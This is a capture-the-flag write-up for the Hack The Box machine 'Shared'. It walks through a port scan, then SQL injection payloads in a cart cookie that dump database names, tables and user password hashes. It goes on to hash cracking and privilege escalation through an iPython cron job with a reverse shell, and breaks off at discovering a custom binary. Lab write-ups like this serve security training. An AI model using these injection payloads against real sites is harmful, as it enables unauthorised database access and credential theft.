HTB: Shared – Merrill Newman

Overview

Shared is a great box that taught me much. You start out by enumerating a web app and then find an SQL injection in an unexpected place. You’ll use this SQL injection to extract a username and a password hash which can be cracked and used to SSH. Once on the box you’ll exploit iPython and Redis to make your way to root.

Scan Details

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 91e835f4695fc2e20e2746e2a6b6d865 (RSA)
|   256 cffcc45d84fb580bbe2dad35409dc351 (ECDSA)
|_  256 a3386d750964ed70cf17499adc126d11 (ED25519)
80/tcp  open  http     nginx 1.18.0
|_http-title: Did not follow redirect to http://shared.htb
|_http-server-header: nginx/1.18.0
443/tcp open  ssl/http nginx 1.18.0
|_http-server-header: nginx/1.18.0
| tls-alpn: 
|   h2
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
| tls-nextprotoneg: 
|   h2
|_  http/1.1
| ssl-cert: Subject: commonName=*.shared.htb/organizationName=HTB/stateOrProvinceName=None/countryName=US
| Not valid before: 2022-03-20T13:37:14
|_Not valid after:  2042-03-15T13:37:14
|_http-title: Did not follow redirect to https://shared.htb
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Enumeration and Initial Foothold

Browsing to the site redirects us to shared.htb so we’ll have to add this to /etc/hosts. After doing so, we are presented with a online store that mentions a new checkout process on the front page.

Trying to test the checkout function, we find out that it doesn’t actually send a request. It just creates an alert.

Taking a closer look at the request used to get the page we see that in the custom_cart cookie, we have some JSON containing the product ID and the quantity to retrieve from the database.

Doing some basic testing with single quotes and comments reveals that this is vulnerable to SQL injection. I used the following payloads to enumerate and exploit the database.

Get Databases

{"' UNION SELECT 1,(SELECT group_concat(schema_name) FROM INFORMATION_SCHEMA.SCHEMATA),3-- -":"1"}

Get Tables

{"' UNION SELECT 1,(SELECT group_concat(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema LIKE 'checkout'),3-- -":"1"}

Get Columns

{"' UNION SELECT 1,(SELECT group_concat(column_name) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name LIKE 'user'),3-- -":"1"}

Get User Information

{"' UNION SELECT 1,(SELECT group_concat(username,':',password) FROM user),3-- -":"1"}

The final payload will return a username and password hash.

Extracting user information via SQL injection

Pasting this into crackstation gives us a hit quickly.

We can then use these credentials to SSH onto the box. But this is not enough to get the user flag, to get the user flag we will have to escalate our privileges to the dan_smith user as the flag is only readable by him and root.

Privilege Escalation

Listing all files in dan_smith’s home directory reveals the hidden .iPython directory. Running strings on the history.sqlite file within reveals that iPython is being ran every minute.

This could be a good target since it looks like iPython is being ran every minute under the dan_smith user. Getting the version (8.0.0) by simply running ipython, we can google for exploits. In the first couple results we will see a GitHub advisory.

Seems simple enough to exploit, but we will need to find out the directory that iPython is being ran from. To do this we can use Pspy.

Pspy output

We can see that the cronjob executes iPython from the /opt/scripts_review directory. With this information we can rip a Python reverse shell off of revshells.com and follow the advisory steps.

From here we can take dan_smith’s ssh key and ssh as him. Continuing our enumeration as dan_smith, we see that we are a part of the sysadmin group. Looking for files owned by this group reveals a custom binary.